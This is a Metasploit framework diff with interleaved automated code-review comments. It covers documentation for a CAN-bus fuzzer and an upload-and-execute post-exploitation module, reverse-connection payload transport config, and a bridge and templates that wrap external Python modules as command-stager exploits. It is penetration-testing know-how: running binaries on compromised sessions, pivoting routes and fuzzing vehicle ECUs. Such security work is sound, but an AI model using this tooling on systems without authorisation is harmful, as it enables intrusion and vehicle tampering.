One of the best things about Meterpreter is you have access to a variety of post modules that
|
||||
"shell" sessions might not have. Post modules provide you with more capabilities to collect data
|
||||
from the remote machine automatically. For example, stealing credentials from the system or
|
||||
third-party applications, or modify settings, etc.
|
||||
|
|
|
@ -0,0 +1,46 @@
|
|||
A basic fuzzer for CAN IDs. It can scan through CAN IDs and probes each data section
|
||||
with a set value. The defualt is 0xFF. It can also iterate through all the possible
|
||||
values for each byte as well. It has no concept of what is going on and makes no
|
||||
attempt to check for return packets.
|
||||
|
||||
## Options
|
||||
|
||||
**STARTID**
|
||||
|
||||
The CAN ID to start your scan from.
|
||||
|
||||
**STOPID**
|
||||
|
||||
The CAN ID to stop the CAN scan. If no STOPID is specified it will only scan one ID (STARTID).
|
||||
|
||||
**FUZZ**
|
||||
|
||||
If true the data segment will iterate through all possiblities (0-255).
|
||||
|
||||
**PROBEVALUE**
|
||||
|
||||
The value to put at each data segment. The default is 0xFF. When Fuzz is enabled this value is ignored.
|
||||
|
||||
**PADDING**
|
||||
|
||||
If you need to pad out the packet to be 8 packets for each request you can set this value to something between 0-255.
|
||||
|
||||
**CANBUS**
|
||||
|
||||
The bus to scan. See 'supported_buses' for a list of available buses.
|
||||
|
||||
## Scenarios
|
||||
|
||||
To quickly test how a vehicle or ECU reacts to random data throughout the packet. For instance, you
|
||||
have identified some door controls using a certain CAN ID. By probing the other values you can often identify
|
||||
other door related functions.
|
||||
|
||||
Note: This is not a scanner. You would not want to run this against all the IDs in a car and expect (good) results.
|
||||
|
||||
```
|
||||
hwbridge > run post/hardware/automotive/canprobe CANBUS=can0 STARTID=0x320 fuzz=true
|
||||
|
||||
[*] Probing 0x320...
|
||||
[*] Probe Complete
|
||||
|
||||
```
|
|
@ -0,0 +1,68 @@
|
|||
This module allows you to upload a binary file, and automatically execute it.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
The following platforms are supported:
|
||||
|
||||
|
||||
* Windows
|
||||
* Linux
|
||||
* OS X
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Prepare for an executable file you wish to upload and execute.
|
||||
2. Obtain a session from the target machine.
|
||||
3. In msfconsole, do ```use post/multi/manage/upload_exec```
|
||||
4. Set the ```LFILE``` option
|
||||
5. Set the ```RFILE``` option
|
||||
6. Set the ```SESSION``` option
|
||||
7. ```run```
|
||||
|
||||
## Options
|
||||
|
||||
**LFILE**
|
||||
|
||||
The file on your machine that you want to upload to the target machine.
|
||||
|
||||
**RFILE**
|
||||
|
||||
The file path on the target machine. This defaults to LFILE.
|
||||
|
||||
## Demo
|
||||
|
||||
```
|
||||
msf > use post/multi/manage/upload_exec
|
||||
msf post(upload_exec) > show options
|
||||
|
||||
Module options (post/multi/manage/upload_exec):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LFILE yes Local file to upload and execute
|
||||
RFILE no Name of file on target (default is basename of LFILE)
|
||||
SESSION yes The session to run this module on.
|
||||
|
||||
msf post(upload_exec) > set lfile /tmp/
|
||||
lfile => /tmp/
|
||||
msf post(upload_exec) > set lfile /tmp/msg.exe
|
||||
lfile => /tmp/msg.exe
|
||||
msf post(upload_exec) > set rfile C:\\Users\\sinn3r\\Desktop\\msg.exe
|
||||
rfile => C:\Users\sinn3r\Desktop\msg.exe
|
||||
msf post(upload_exec) > sessions
|
||||
|
||||
Active sessions
|
||||
===============
|
||||
|
||||
Id Type Information Connection
|
||||
-- ---- ----------- ----------
|
||||
1 meterpreter x86/windows WIN-6NH0Q8CJQVM\sinn3r @ WIN-6NH0Q8CJQVM 192.168.146.1:4444 -> 192.168.146.149:50168 (192.168.146.149)
|
||||
|
||||
msf post(upload_exec) > set session 1
|
||||
session => 1
|
||||
|
||||
msf post(upload_exec) > run
|
||||
|
||||
[-] Post interrupted by the console user
|
||||
[*] Post module execution completed
|
||||
```
|
|
@ -30,7 +30,7 @@ module Metasploit
|
|||
end
|
||||
end
|
||||
|
||||
VERSION = "4.14.15"
|
||||
VERSION = "4.14.17"
|
||||
MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
|
||||
PRERELEASE = 'dev'
|
||||
HASH = get_hash
|
||||
|
|
|
@ -10,7 +10,7 @@ module Sessions
|
|||
# This class creates a platform-specific meterpreter session type
|
||||
#
|
||||
###
|
||||
class Meterpreter_x64_Mettle_Linux < Msf::Sessions::Meterpreter
|
||||
class Meterpreter_x64_Linux < Msf::Sessions::Meterpreter
|
||||
def supports_ssl?
|
||||
false
|
||||
end
|
|
@ -11,6 +11,12 @@ module Sessions
|
|||
#
|
||||
###
|
||||
class Meterpreter_x86_Linux < Msf::Sessions::Meterpreter
|
||||
def supports_ssl?
|
||||
false
|
||||
end
|
||||
def supports_zlib?
|
||||
false
|
||||
end
|
||||
def initialize(rstream, opts={})
|
||||
super
|
||||
self.base_platform = 'linux'
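Review bot: The two new predicates `supports_ssl?` and `supports_zlib?` return false with no explanation, and since they now apply to every x86 Linux Meterpreter session rather than only the former Mettle-specific class, the reason should be recorded next to them. If, as the surrounding session code suggests, `supports_ssl?` controls whether the session layer wraps the TCP stream in TLS, returning false means these sessions carry packets without that protection, which an operator choosing a transport would want to know. I would add `# Mettle does not implement the legacy packet-level SSL or zlib negotiation; the transport itself must provide confidentiality` above the first predicate. The class body continues past the end of this hunk.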
|
||||
|
|
|
@ -1,29 +0,0 @@
|
|||
# -*- coding: binary -*-
|
||||
|
||||
require 'msf/base/sessions/meterpreter'
|
||||
|
||||
module Msf
|
||||
module Sessions
|
||||
|
||||
###
|
||||
#
|
||||
# This class creates a platform-specific meterpreter session type
|
||||
#
|
||||
###
|
||||
class Meterpreter_x86_Mettle_Linux < Msf::Sessions::Meterpreter
|
||||
def supports_ssl?
|
||||
false
|
||||
end
|
||||
def supports_zlib?
|
||||
false
|
||||
end
|
||||
def initialize(rstream, opts={})
|
||||
super
|
||||
self.base_platform = 'linux'
|
||||
self.base_arch = ARCH_X86
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
|
@ -1,22 +1,75 @@
|
|||
# -*- coding: binary -*-
|
||||
|
||||
require 'msf/core/payload/transport_config'
|
||||
require 'msf/core/payload/uuid/options'
|
||||
require 'base64'
|
||||
|
||||
module Msf
|
||||
module Sessions
|
||||
module MettleConfig
|
||||
module Sessions
|
||||
module MettleConfig
|
||||
|
||||
include Msf::Payload::TransportConfig
|
||||
|
||||
def generate_uri(opts={})
|
||||
ds = opts[:datastore] || datastore
|
||||
uri_req_len = ds['StagerURILength'].to_i
|
||||
|
||||
# Choose a random URI length between 30 and 128 bytes
|
||||
if uri_req_len == 0
|
||||
uri_req_len = 30 + luri.length + rand(127 - (30 + luri.length))
|
||||
end
|
||||
|
||||
if uri_req_len < 5
|
||||
raise ArgumentError, "Minimum StagerURILength is 5"
|
||||
end
|
||||
|
||||
generate_uri_uuid_mode(:init_connect, uri_req_len, uuid: opts[:uuid])
|
||||
end
|
||||
|
||||
def generate_http_uri(opts)
|
||||
if Rex::Socket.is_ipv6?(opts[:lhost])
|
||||
target_uri = "#{opts[:scheme]}://[#{opts[:lhost]}]"
|
||||
else
|
||||
target_uri = "#{opts[:scheme]}://#{opts[:lhost]}"
|
||||
end
|
||||
|
||||
target_uri << ':'
|
||||
target_uri << opts[:lport].to_s
|
||||
target_uri << luri
|
||||
target_uri << generate_uri(opts)
|
||||
target_uri
|
||||
end
|
||||
|
||||
def generate_tcp_uri(opts)
|
||||
if Rex::Socket.is_ipv6?(opts[:lhost])
|
||||
target_uri = "#{opts[:scheme]}://[#{opts[:lhost]}]"
|
||||
else
|
||||
target_uri = "#{opts[:scheme]}://#{opts[:lhost]}"
|
||||
end
|
||||
target_uri << ':'
|
||||
target_uri << opts[:lport].to_s
|
||||
target_uri
|
||||
end
|
||||
|
||||
def generate_config(opts={})
|
||||
transport = transport_config_reverse_tcp(opts)
|
||||
opts[:uuid] ||= generate_payload_uuid
|
||||
case opts[:scheme]
|
||||
when 'http'
|
||||
transport = transport_config_reverse_http(opts)
|
||||
opts[:uri] = generate_http_uri(transport)
|
||||
when 'https'
|
||||
transport = transport_config_reverse_https(opts)
|
||||
opts[:uri] = generate_http_uri(transport)
|
||||
when 'tcp'
|
||||
transport = transport_config_reverse_tcp(opts)
|
||||
opts[:uri] = generate_tcp_uri(transport)
|
||||
else
|
||||
raise ArgumentError, "Unknown scheme: #{opts[:scheme]}"
|
||||
end
|
||||
opts[:uuid] = Base64.encode64(opts[:uuid].to_raw).strip
|
||||
opts[:uri] ||= "#{transport[:scheme]}://#{transport[:lhost]}:#{transport[:lport]}"
|
||||
opts.slice(:uuid, :uri, :debug, :log_file)
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
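Review bot: `generate_config` writes the encoded value back into the caller's hash at `opts[:uuid] = Base64.encode64(opts[:uuid].to_raw).strip`, replacing the UUID object the caller passed in (or had generated through `||=`) with a String, so anything that looks at `opts[:uuid]` after the call, for example to register the UUID with a handler, sees a different type than it supplied; keep the encoded form in a local, and use `Base64.strict_encode64(opts[:uuid].to_raw)` so the `.strip` of `encode64`'s trailing newline is not needed. In `generate_uri`, `rand(127 - (30 + luri.length))` receives a non-positive argument once `luri` is longer than 96 characters, and `Kernel#rand(0)` returns a Float, so `uri_req_len` would stop being an Integer; clamp it, `uri_req_len = 30 + luri.length + rand([127 - (30 + luri.length), 1].max)`, or reject over-long LURI values with the same `ArgumentError` used for short lengths. The comment `# Choose a random URI length between 30 and 128 bytes` should then mention that `luri` is included in that budget. `luri`, `generate_uri_uuid_mode` and the `transport_config_*` helpers are defined outside this hunk, so this is a hedged reading of them.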
|
||||
|
|
|
@ -194,6 +194,8 @@ module Exploit::Remote::SMTPDeliver
|
|||
full_msg << date unless data =~ /date: /i
|
||||
full_msg << subject unless subject.nil? || data =~ /subject: /i
|
||||
full_msg << data
|
||||
# Escape leading dots in the mail messages so there are no false EOF
|
||||
full_msg.gsub!(/(?m)^\./, '..')
|
||||
send_status = raw_send_recv("#{full_msg}\r\n.\r\n", nsock)
|
||||
end
|
||||
else
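Review bot: The `(?m)` in `full_msg.gsub!(/(?m)^\./, '..')` does not do what a Perl or PCRE reader expects: in Ruby `^` is always a line anchor, and `m` is the dotall flag that only changes `.`, which this pattern does not use, so the option is a no-op that will mislead the next maintainer. Writing it as `full_msg.gsub!(/^\./, '..')` keeps the behaviour, and because `^` matches after `\n` it also covers CRLF-terminated bodies. The stuffing is applied to the `date` and `subject` lines prepended just above as well, which is harmless but worth stating in the comment, e.g. `# RFC 5321 4.5.2 dot-stuffing on every line (headers included); the receiver strips the extra dot`. The enclosing method starts before the hunk.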
|
||||
|
|
|
@ -45,7 +45,7 @@ module ReverseHttp
|
|||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('LHOST', [true, 'The local listener hostname']),
|
||||
OptAddressLocal.new('LHOST', [true, 'The local listener hostname']),
|
||||
OptPort.new('LPORT', [true, 'The local listener port', 8080]),
|
||||
OptString.new('LURI', [false, 'The HTTP Path', ''])
|
||||
], Msf::Handler::ReverseHttp)
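Review bot: The option type is tightened to `OptAddressLocal` but its description still reads `'The local listener hostname'`; if `OptAddressLocal` (defined outside this hunk) validates the value as an address or local interface name, the text should say so, e.g. `'The local listener hostname, IP address or interface name'`, because reverse HTTP LHOSTs are routinely set to a redirector's DNS name and an operator needs to know whether that is still accepted. It is worth confirming with a real hostname that the new validator neither rejects it nor silently resolves it to an IP before the value is embedded in the payload URI, since the https-proxy handler below receives the same change. The `initialize` this sits in starts before the hunk.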
|
||||
|
|
|
@ -38,7 +38,7 @@ module ReverseHttpsProxy
|
|||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('LHOST', [ true, "The local listener hostname" ,"127.0.0.1"]),
|
||||
OptAddressLocal.new('LHOST', [ true, "The local listener hostname" ,"127.0.0.1"]),
|
||||
OptPort.new('LPORT', [ true, "The local listener port", 8443 ]),
|
||||
OptString.new('PayloadProxyHost', [true, "The proxy server's IP address", "127.0.0.1"]),
|
||||
OptPort.new('PayloadProxyPort', [true, "The proxy port to connect to", 8080 ]),
|
||||
|
|
|
@ -0,0 +1,23 @@
|
|||
module Msf::Module::External
|
||||
def wait_status(mod)
|
||||
while mod.running
|
||||
m = mod.get_status
|
||||
if m
|
||||
case m['level']
|
||||
when 'error'
|
||||
print_error m['message']
|
||||
when 'warning'
|
||||
print_warning m['message']
|
||||
when 'good'
|
||||
print_good m['message']
|
||||
when 'info'
|
||||
print_status m['message']
|
||||
when 'debug'
|
||||
vprint_status m['message']
|
||||
else
|
||||
print_status m['message']
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
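Review bot: `wait_status` is undocumented and, as written, spins without yielding whenever `mod.get_status` returns nil while `mod.running` is still true; if `get_status` (defined on the bridge, outside this file) does not itself block or time out, this is a hot loop on the console thread, so that contract should be confirmed and stated. A header comment along the lines of `# Pump status messages from an external module's bridge until the subprocess exits, mapping JSON-RPC 'message' levels onto the console printers; unknown levels fall through to print_status.` would cover it. Errors are only printed here and nothing tells the caller that the external module reported `'error'`, so a caller that must decide whether to continue has no signal; returning a boolean that is cleared when an error-level message was seen would give it one.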
|
|
@ -7,6 +7,10 @@ class Msf::Modules::External::Bridge
|
|||
|
||||
attr_reader :path, :running
|
||||
|
||||
def self.applies?(module_name)
|
||||
File::executable? module_name
|
||||
end
|
||||
|
||||
def meta
|
||||
@meta ||= describe
|
||||
end
|
||||
|
@ -34,6 +38,7 @@ class Msf::Modules::External::Bridge
|
|||
end
|
||||
|
||||
def initialize(module_path)
|
||||
self.env = {}
|
||||
self.running = false
|
||||
self.path = module_path
|
||||
end
|
||||
|
@ -41,7 +46,7 @@ class Msf::Modules::External::Bridge
|
|||
protected
|
||||
|
||||
attr_writer :path, :running
|
||||
attr_accessor :ios
|
||||
attr_accessor :env, :ios
|
||||
|
||||
def describe
|
||||
resp = send_receive(Msf::Modules::External::Message.new(:describe))
|
||||
|
@ -57,7 +62,7 @@ class Msf::Modules::External::Bridge
|
|||
end
|
||||
|
||||
def send(message)
|
||||
input, output, status = ::Open3.popen3([self.path, self.path])
|
||||
input, output, status = ::Open3.popen3(env, [self.path, self.path])
|
||||
self.ios = [input, output, status]
|
||||
case Rex::ThreadSafe.select(nil, [input], nil, 0.1)
|
||||
when nil
|
||||
|
@ -98,3 +103,31 @@ class Msf::Modules::External::Bridge
|
|||
[input, output].each {|fd| fd.close rescue nil} # Yeah, yeah. I know.
|
||||
end
|
||||
end
|
||||
|
||||
class Msf::Modules::External::PyBridge < Msf::Modules::External::Bridge
|
||||
def self.applies?(module_name)
|
||||
module_name.match? /\.py$/
|
||||
end
|
||||
|
||||
def initialize(module_path)
|
||||
super
|
||||
pythonpath = ENV['PYTHONPATH'] || ''
|
||||
self.env = self.env.merge({ 'PYTHONPATH' => pythonpath + File::PATH_SEPARATOR + File.expand_path('../python', __FILE__) })
|
||||
end
|
||||
end
|
||||
|
||||
class Msf::Modules::External::Bridge
|
||||
|
||||
LOADERS = [
|
||||
Msf::Modules::External::PyBridge,
|
||||
Msf::Modules::External::Bridge
|
||||
]
|
||||
|
||||
def self.open(module_path)
|
||||
LOADERS.each do |klass|
|
||||
return klass.new module_path if klass.applies? module_path
|
||||
end
|
||||
|
||||
nil
|
||||
end
|
||||
end
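Review bot: `PyBridge#initialize` appends the framework's helper directory after whatever is already in `PYTHONPATH`, so any entry an operator (or a hostile environment) has there can shadow the `metasploit` helper package every Python module imports, and when `PYTHONPATH` is unset the value begins with the separator, leaving an empty component that CPython may treat as the current working directory on `sys.path` — worth confirming. Prepending and skipping the empty case closes both: `lib = File.expand_path('../python', __FILE__)` / `existing = ENV['PYTHONPATH'].to_s` / `self.env = env.merge('PYTHONPATH' => existing.empty? ? lib : "#{lib}#{File::PATH_SEPARATOR}#{existing}")`. `PyBridge.applies?` uses `/\.py$/`, where `\z` is the stricter end-of-string anchor in Ruby. `Bridge.open` returns nil when no loader matches, and the caller in shim.rb dereferences the result without checking, so either document that contract here or raise a descriptive error instead of returning nil.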
|
||||
|
|
|
@ -0,0 +1,20 @@
|
|||
import sys, os, json
|
||||
|
||||
def log(message, level='info'):
|
||||
print(json.dumps({'jsonrpc': '2.0', 'method': 'message', 'params': {
|
||||
'level': level,
|
||||
'message': message
|
||||
}}))
|
||||
sys.stdout.flush()
|
||||
|
||||
def run(metadata, exploit):
|
||||
req = json.loads(os.read(0, 10000))
|
||||
if req['method'] == 'describe':
|
||||
print(json.dumps({'jsonrpc': '2.0', 'id': req['id'], 'response': metadata}))
|
||||
elif req['method'] == 'run':
|
||||
args = req['params']
|
||||
exploit(args)
|
||||
print(json.dumps({'jsonrpc': '2.0', 'id': req['id'], 'response': {
|
||||
'message': 'Exploit completed'
|
||||
}}))
|
||||
sys.stdout.flush()
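Review bot: `req = json.loads(os.read(0, 10000))` takes a single read of at most 10000 bytes and treats it as the whole request, so a `run` request whose params (the full datastore plus the `command` string the cmdstager passes in) exceed that size, or one the pipe delivers in more than one chunk, is truncated and raises a `JSONDecodeError` instead of running. Read until the document parses or EOF, as below; the Ruby bridge's framing is not visible from here, so if it terminates messages with a newline, `sys.stdin.readline()` is the simpler fix. An unknown `method` currently produces no reply at all and leaves the Ruby side waiting; a JSON-RPC error object carrying the request `id` would make that failure visible. Because status goes over stdout, any stray `print` in a module corrupts the protocol stream, which deserves a comment telling module authors to use `log` only.
```python
def run(metadata, exploit):
    buf = b''
    while True:
        chunk = os.read(0, 65536)
        if not chunk:
            break  # EOF: let the final json.loads report the truncation
        buf += chunk
        try:
            json.loads(buf.decode('utf-8'))
            break
        except ValueError:
            continue
    req = json.loads(buf.decode('utf-8'))
    # … unchanged: describe / run dispatch …
```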
|
|
@ -4,98 +4,56 @@ require 'msf/core/modules/external/bridge'
|
|||
|
||||
class Msf::Modules::External::Shim
|
||||
def self.generate(module_path)
|
||||
mod = Msf::Modules::External::Bridge.new(module_path)
|
||||
mod = Msf::Modules::External::Bridge.open(module_path)
|
||||
return '' unless mod.meta
|
||||
case mod.meta['type']
|
||||
when 'remote_exploit.cmd_stager.wget'
|
||||
when 'remote_exploit_cmd_stager'
|
||||
remote_exploit_cmd_stager(mod)
|
||||
end
|
||||
end
|
||||
|
||||
def self.remote_exploit_cmd_stager(mod)
|
||||
%Q|
|
||||
require 'msf/core/modules/external/bridge'
|
||||
def self.render_template(name, meta = {})
|
||||
template = File.join(File.dirname(__FILE__), 'templates', name)
|
||||
ERB.new(File.read(template)).result(binding)
|
||||
end
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
def self.common_metadata(meta = {})
|
||||
render_template('common_metadata.erb', meta)
|
||||
end
|
||||
|
||||
include Msf::Exploit::CmdStager
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => #{mod.meta['name'].dump},
|
||||
'Description' => #{mod.meta['description'].dump},
|
||||
'Author' =>
|
||||
[
|
||||
#{mod.meta['authors'].map(&:dump).join(', ')}
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
#{mod.meta['references'].map do |r|
|
||||
def self.mod_meta_common(mod, meta = {})
|
||||
meta[:path] = mod.path.dump
|
||||
meta[:name] = mod.meta['name'].dump
|
||||
meta[:description] = mod.meta['description'].dump
|
||||
meta[:authors] = mod.meta['authors'].map(&:dump).join(",\n ")
|
||||
meta[:date] = mod.meta['date'].dump
|
||||
meta[:references] = mod.meta['references'].map do |r|
|
||||
"[#{r['type'].upcase.dump}, #{r['ref'].dump}]"
|
||||
end.join(', ')}
|
||||
],
|
||||
'DisclosureDate' => #{mod.meta['date'].dump},
|
||||
'Privileged' => #{mod.meta['privileged'].inspect},
|
||||
'Platform' => [#{mod.meta['targets'].map{|t| t['platform'].dump}.uniq.join(', ')}],
|
||||
'Payload' =>
|
||||
{
|
||||
'DisableNops' => true
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
#{mod.meta['targets'].map do |t|
|
||||
%Q^[#{t['platform'].dump} + ' ' + #{t['arch'].dump},
|
||||
{'Arch' => ARCH_#{t['arch'].upcase}, 'Platform' => #{t['platform'].dump} }]^
|
||||
end.join(', ')}
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DefaultOptions' => { 'WfsDelay' => 5 }
|
||||
))
|
||||
end.join(",\n ")
|
||||
|
||||
register_options([
|
||||
#{mod.meta['options'].map do |n, o|
|
||||
meta[:options] = mod.meta['options'].map do |n, o|
|
||||
"Opt#{o['type'].capitalize}.new(#{n.dump},
|
||||
[#{o['required']}, #{o['description'].dump}, #{o['default'].inspect}])"
|
||||
end.join(', ')}
|
||||
], self.class)
|
||||
end.join(",\n ")
|
||||
meta
|
||||
end
|
||||
|
||||
def execute_command(cmd, opts)
|
||||
mod = Msf::Modules::External::Bridge.new(#{mod.path.dump})
|
||||
mod.run(datastore.merge(command: cmd))
|
||||
wait_status(mod)
|
||||
true
|
||||
def self.mod_meta_exploit(mod, meta = {})
|
||||
meta[:wfsdelay] = mod.meta['wfsdelay'] || 5
|
||||
meta[:privileged] = mod.meta['privileged'].inspect
|
||||
meta[:platform] = mod.meta['targets'].map do |t|
|
||||
t['platform'].dump
|
||||
end.uniq.join(",\n ")
|
||||
meta[:targets] = mod.meta['targets'].map do |t|
|
||||
"[#{t['platform'].dump} + ' ' + #{t['arch'].dump}, {'Arch' => ARCH_#{t['arch'].upcase}, 'Platform' => #{t['platform'].dump} }]"
|
||||
end.join(",\n ")
|
||||
meta
|
||||
end
|
||||
|
||||
def exploit
|
||||
print_status("Exploiting...")
|
||||
execute_cmdstager({:flavor => :wget})
|
||||
end
|
||||
|
||||
def wait_status(mod)
|
||||
while mod.running
|
||||
m = mod.get_status
|
||||
if m
|
||||
case m['level']
|
||||
when 'error'
|
||||
print_error m['message']
|
||||
when 'warning'
|
||||
print_warning m['message']
|
||||
when 'good'
|
||||
print_good m['message']
|
||||
when 'info'
|
||||
print_status m['message']
|
||||
when 'debug'
|
||||
vprint_status m['message']
|
||||
else
|
||||
print_status m['message']
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
||||
def self.remote_exploit_cmd_stager(mod)
|
||||
meta = mod_meta_common(mod)
|
||||
meta = mod_meta_exploit(mod, meta)
|
||||
meta[:command_stager_flavor] = mod.meta['payload']['command_stager_flavor'].dump
|
||||
render_template('remote_exploit_cmd_stager.erb', meta)
|
||||
end
|
||||
end
|
||||
|
|
|
@ -0,0 +1,7 @@
|
|||
'Name' => <%= meta[:name] %>,
|
||||
'Description' => <%= meta[:description] %>,
|
||||
'Author' =>
|
||||
[
|
||||
<%= meta[:authors] %>
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
|
@ -0,0 +1,48 @@
|
|||
require 'msf/core/modules/external/bridge'
|
||||
require 'msf/core/module/external'
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Module::External
|
||||
include Msf::Exploit::CmdStager
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
<%= common_metadata meta %>
|
||||
'References' =>
|
||||
[
|
||||
<%= meta[:references] %>
|
||||
],
|
||||
'DisclosureDate' => <%= meta[:date] %>,
|
||||
'Privileged' => <%= meta[:privileged] %>,
|
||||
'Platform' => [<%= meta[:platform] %>],
|
||||
'Payload' =>
|
||||
{
|
||||
'DisableNops' => true
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
<%= meta[:targets] %>
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DefaultOptions' => { 'WfsDelay' => <%= meta[:wfsdelay] %> }
|
||||
))
|
||||
|
||||
register_options([
|
||||
<%= meta[:options] %>
|
||||
])
|
||||
end
|
||||
|
||||
def execute_command(cmd, opts)
|
||||
mod = Msf::Modules::External::Bridge.open(<%= meta[:path] %>)
|
||||
mod.run(datastore.merge(command: cmd))
|
||||
wait_status(mod)
|
||||
true
|
||||
end
|
||||
|
||||
def exploit
|
||||
print_status("Exploiting...")
|
||||
execute_cmdstager({:flavor => :<%= meta[:command_stager_flavor] %>})
|
||||
end
|
||||
end
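Review bot: `execute_command` in the new template returns the literal `true` no matter what `mod.run(datastore.merge(command: cmd))` returned or what `wait_status(mod)` drained (presumably provided by the included `Msf::Module::External`), so a bridge failure or an error-level status is still reported to the cmdstager as a successful command; return the outcome of `mod.run`, or track whether an `error` message was seen, instead of the constant. `'DefaultOptions' => { 'WfsDelay' => <%= meta[:wfsdelay] %> }` interpolates its value raw while every other metadata field is emitted through `.dump`/`.inspect`; the producer visible above sets `meta[:wfsdelay] = mod.meta['wfsdelay'] || 5`, so a non-integer `wfsdelay` in a module's metadata becomes unquoted Ruby in the generated file — `Integer(mod.meta['wfsdelay'] || 5)` there would fail early and clearly. The `opts` parameter of `execute_command` is unused and could be `_opts`.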
|
|
@ -28,7 +28,7 @@ module Msf
|
|||
|
||||
# @return [OptAddress]
|
||||
def self.LHOST(default=nil, required=true, desc="The listen address")
|
||||
Msf::OptAddress.new(__method__.to_s, [ required, desc, default ])
|
||||
Msf::OptAddressLocal.new(__method__.to_s, [ required, desc, default ])
|
||||
end
|
||||
|
||||
# @return [OptPort]
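Review bot: The YARD tag above the changed line still reads `# @return [OptAddress]`; now that `Opt.LHOST` builds an `OptAddressLocal`, which additionally accepts an interface name, `# @return [OptAddressLocal]` documents the type callers actually receive. The enclosing `Opt` module continues outside the hunk.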
|
||||
|
|
|
@ -0,0 +1,41 @@
|
|||
# -*- coding: binary -*-
|
||||
require 'network_interface'
|
||||
|
||||
module Msf
|
||||
|
||||
###
|
||||
#
|
||||
# Network address option.
|
||||
#
|
||||
###
|
||||
class OptAddressLocal < OptAddress
|
||||
def normalize(value)
|
||||
return nil unless value.kind_of?(String)
|
||||
|
||||
if NetworkInterface.interfaces.include?(value)
|
||||
ip_address = NetworkInterface.addresses(value).values.flatten.collect{|x| x['addr']}.select do |addr|
|
||||
begin
|
||||
IPAddr.new(addr).ipv4?
|
||||
rescue IPAddr::InvalidAddressError => e
|
||||
false
|
||||
end
|
||||
end
|
||||
|
||||
return false if ip_address.blank?
|
||||
return ip_address.first
|
||||
end
|
||||
|
||||
return value
|
||||
end
|
||||
|
||||
def valid?(value, check_empty: true)
|
||||
return false if check_empty && empty_required_value?(value)
|
||||
return false unless value.kind_of?(String) or value.kind_of?(NilClass)
|
||||
|
||||
return true if NetworkInterface.interfaces.include?(value)
|
||||
|
||||
return super
|
||||
end
|
||||
end
|
||||
|
||||
end
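Review bot: `normalize` returns `false` when the named interface has no IPv4 address (`return false if ip_address.blank?`) while every other path returns `nil` or a String, and `valid?` accepts any interface name whether or not one resolves, so such a value passes validation and then normalizes to `false`; use `return nil if ip_address.blank?` and have `valid?` require that `normalize(value)` yields an address before returning true for an interface name. `rescue IPAddr::InvalidAddressError => e` binds an `e` that is never used, and `IPAddr` is referenced without a `require 'ipaddr'` in this file — presumably loaded elsewhere, worth confirming. The class header `# Network address option.` is copied from `OptAddress`; `# Network address option that also accepts a local interface name, resolved to its first IPv4 address.` describes this subclass. Style: `collect{|x| x['addr']}` reads as `map { |x| x['addr'] }`, and `or` in `return false unless value.kind_of?(String) or value.kind_of?(NilClass)` should be `||`.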
|
|
@ -7,6 +7,7 @@ module Msf
|
|||
autoload :OptBase, 'msf/core/opt_base'
|
||||
|
||||
autoload :OptAddress, 'msf/core/opt_address'
|
||||
autoload :OptAddressLocal, 'msf/core/opt_address_local'
|
||||
autoload :OptAddressRange, 'msf/core/opt_address_range'
|
||||
autoload :OptBool, 'msf/core/opt_bool'
|
||||
autoload :OptEnum, 'msf/core/opt_enum'
|
||||
|
|
|
@ -411,6 +411,10 @@ module Msf
|
|||
# Allow comma separated list of encoders so users can choose several
|
||||
encoder.split(',').each do |chosen_encoder|
|
||||
e = framework.encoders.create(chosen_encoder)
|
||||
if e.nil?
|
||||
cli_print "Skipping invalid encoder #{chosen_encoder}"
|
||||
next
|
||||
end
|
||||
e.datastore.import_options_from_hash(datastore)
|
||||
encoders << e if e
|
||||
end
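Review bot: `encoders << e if e` on the last new line keeps a nil guard that the added `if e.nil? … next` block has already made redundant; `encoders << e` alone states the intent now. The enclosing method starts and ends outside the hunk.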
|
||||
|
|
|
@ -827,10 +827,33 @@ class Core
|
|||
end
|
||||
|
||||
def cmd_route_help
|
||||
print_line "Usage: route [add/remove/get/flush/print] subnet netmask [comm/sid]"
|
||||
print_line
|
||||
print_line "Route traffic destined to a given subnet through a supplied session."
|
||||
print_line "The default comm is Local."
|
||||
print_line
|
||||
print_line "Usage:"
|
||||
print_line " route [add/remove] subnet netmask [comm/sid]"
|
||||
print_line " route [add/remove] cidr [comm/sid]"
|
||||
print_line " route [get] <host or network>"
|
||||
print_line " route [flush]"
|
||||
print_line " route [print]"
|
||||
print_line
|
||||
print_line "Subcommands:"
|
||||
print_line " add - make a new route"
|
||||
print_line " remove - delete a route; 'del' is an alias"
|
||||
print_line " flush - remove all routes"
|
||||
print_line " get - display the route for a given target"
|
||||
print_line " print - show all active routes"
|
||||
print_line
|
||||
print_line "Examples:"
|
||||
print_line " Add a route for all hosts from 192.168.0.0 to 192.168.0.0 through session 1"
|
||||
print_line " route add 192.168.0.0 255.255.255.0 1"
|
||||
print_line " route add 192.168.0.0/24 1"
|
||||
print_line
|
||||
print_line " Delete the above route"
|
||||
print_line " route remove 192.168.0.0/24 1"
|
||||
print_line " route del 192.168.0.0 255.255.255.0 1"
|
||||
print_line
|
||||
print_line " Display the route that would be used for the given host or network"
|
||||
print_line " route get 192.168.0.11"
|
||||
print_line
|
||||
end
